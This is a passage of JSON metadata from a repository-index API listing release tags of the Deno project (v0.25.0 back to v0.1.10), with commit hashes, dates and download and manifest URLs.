parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/